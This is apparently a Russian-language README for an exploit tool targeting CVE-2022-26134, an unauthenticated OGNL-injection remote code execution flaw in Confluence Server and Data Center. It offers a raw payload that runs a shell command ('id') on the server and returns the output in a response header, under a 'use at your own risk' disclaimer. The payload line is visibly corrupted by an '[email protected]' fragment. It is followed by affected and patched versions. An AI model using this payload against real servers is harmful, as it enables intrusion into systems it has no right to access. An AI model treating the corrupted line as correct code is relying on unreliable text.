BotCon
Attlasian Confluence: неаутентифицированное удаленное выполнение кода через OGNL-инъекцию (CVE-2022-26134)
- 2 июня 2022 года Atlassian выпустила бюллетень безопасности для своих приложений Confluence Server и Data Center, сообщив о критической уязвимости, позволяющей неаутентифицированное удаленное выполнение кода. Уязвимость OGNL-инъекции позволяет неаутентифицированному пользователю выполнять произвольный код в экземпляре Confluence Server или Data Center.
ПРОЧТИ ЭТО!
Используйте с осторожностью. Вы несете ответственность за свои действия.
Разработчики не несут ответственности и не отвечают за любое неправильное использование или ущерб.

RAW-полезная нагрузка
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
Детали уязвимости
-
Затронутый продукт:
- Confluence
- Confluence Server
- Confluence Data Center
-
Затронутые версии:
- Все поддерживаемые версии Confluence Server и Data Center уязвимы.
- Версии Confluence Server и Data Center после 1.3.0 уязвимы.
Меры по устранению
- Обновите вашу версию Attlasian Confluence до одной из этих исправленных версий:
- 7.4.17
- 7.13.7
- 7.14.3
- 7.15.2
- 7.16.4
- 7.17.4
- 7.18.1